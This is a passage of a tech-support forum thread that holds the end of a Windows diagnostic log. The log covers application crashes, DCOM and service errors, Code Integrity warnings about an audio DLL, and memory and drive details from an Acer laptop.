Faulting module name: KERNELBASE.dll, version: 6.3.9600.17415, time stamp: 0x54505737
Exception code: 0xe0434352
Fault offset: 0x0000000000008b9c
Faulting process id: 0x15dc
Faulting application start time: 0xHPSF.exe0
Faulting application path: HPSF.exe1
Faulting module path: HPSF.exe2
Report Id: HPSF.exe3
Faulting package full name: HPSF.exe4
Faulting package-relative application ID: HPSF.exe5

Error: (01/10/2016 03:51:26 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: HPSF.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.TypeInitializationException
Stack:
at HP.SupportAssistant.Engine.DeviceDetect.DeviceDetection.get_Instance()
at HP.SupportAssistant.Engine.HPSAContext.ReloadDeviceActionItemCollection()
at HP.SupportAssistant.Engine.Utils.HPSAUtil.UpdateTaskbarForDetectedIssues()
at HP.SupportAssistant.HPSA_UI.App.RunScheduleTaskCleanup(System.Object)
at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
at System.Threading.ThreadHelper.ThreadStart(System.Object)

Error: (01/10/2016 03:12:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 12531

Error: (01/10/2016 03:12:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 12531

Error: (01/10/2016 03:12:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second


System errors:
=============
Error: (01/10/2016 09:13:25 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The WinHTTP Web Proxy Auto-Discovery Service service depends on the DHCP Client service which failed to start because of the following error:
%%1068

Error: (01/10/2016 09:12:24 PM) (Source: DCOM) (EventID: 10005) (User: ACER)
Description: 1084ShellHWDetectionUnavailable{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/10/2016 09:12:18 PM) (Source: DCOM) (EventID: 10005) (User: ACER)
Description: 1084WSearchUnavailable{9E175B6D-F52A-11D8-B9A5-505054503030}

Error: (01/10/2016 09:12:16 PM) (Source: DCOM) (EventID: 10005) (User: ACER)
Description: 1084ShellHWDetectionUnavailable{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/10/2016 09:12:14 PM) (Source: DCOM) (EventID: 10005) (User: ACER)
Description: 1084WSearchUnavailable{9E175B6D-F52A-11D8-B9A5-505054503030}

Error: (01/10/2016 09:12:10 PM) (Source: DCOM) (EventID: 10005) (User: ACER)
Description: 1084ShellHWDetectionUnavailable{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/10/2016 09:12:04 PM) (Source: DCOM) (EventID: 10005) (User: ACER)
Description: 1084ShellHWDetectionUnavailable{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/10/2016 09:11:59 PM) (Source: DCOM) (EventID: 10005) (User: ACER)
Description: 1084ShellHWDetectionUnavailable{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/10/2016 09:11:54 PM) (Source: DCOM) (EventID: 10005) (User: ACER)
Description: 1084ShellHWDetectionUnavailable{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/10/2016 09:11:54 PM) (Source: DCOM) (EventID: 10005) (User: ACER)
Description: 1068netprofmUnavailable{A47979D2-C419-11D9-A5B4-001185AD2B89}


CodeIntegrity:
===================================
Date: 2016-01-09 17:17:57.014
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-09 17:17:39.215
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-09 17:17:38.978
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-09 17:17:38.666
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-09 17:17:37.837
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-09 17:17:20.422
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-09 17:17:19.605
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-09 17:17:18.912
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-09 17:17:16.937
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-09 17:17:16.370
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i5-3210M CPU @ 2.50GHz
Percentage of memory in use: 16%
Total physical RAM: 8007.27 MB
Available physical RAM: 6654.75 MB
Total Virtual: 16199.27 MB
Available Virtual: 14920.64 MB

==================== Drives ================================

Drive c: (Acer) (Fixed) (Total:681.41 GB) (Free:497.65 GB) NTFS
Drive e: (Lexar) (Removable) (Total:7.46 GB) (Free:0.47 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 6B0758F4)

Partition: GPT.

========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 7.5 GB) (Disk ID: C3072E18)
Partition 1: (Active) - (Size=7.5 GB) - (Type=0C)

==================== End of Addition.txt ============================
 
You must log in or register to reply here.

Similar threads

Scorpus
Intel lifts the lid on Arc laptop GPUs, here's what you need to know
Replies
15
Views
3K
meric
M
Julio Franco
Thinking about buying refurbished tech? What you need to know
Replies
11
Views
2K
lazer
lazer
monrayl
  • Locked
Solved I have a virus on my PC, I cannot identify it and I don't know what to do next
2
Replies
46
Views
14K
Broni
Broni

Latest posts

Back